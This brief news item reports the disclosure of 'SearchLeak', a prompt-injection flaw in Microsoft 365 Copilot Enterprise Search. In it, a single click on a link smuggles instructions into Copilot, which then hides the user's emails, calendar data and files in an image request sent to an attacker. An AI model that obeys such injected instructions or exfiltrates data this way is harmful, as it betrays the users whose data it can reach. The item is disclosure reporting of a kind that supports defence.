One click on a normal Microsoft link and Copilot quietly ships emails, calendar, and files to an attacker. No password, no second click. Varonis disclosed this
A security vulnerability dubbed "SearchLeak" has been disclosed, affecting Microsoft 365 Copilot Enterprise Search. This flaw allows attackers to exfiltrate emails, calendar data, and files with a single click on a malicious link, bypassing standard security measures. The exploit smuggles instructions into Copilot, which then hides the stolen data within an image request. While Microsoft has implemented a server-side mitigation, the vulnerability highlights potential risks associated with AI-powered productivity tools. AI
IMPACT Highlights potential data exfiltration risks in AI-integrated productivity suites, necessitating robust security measures.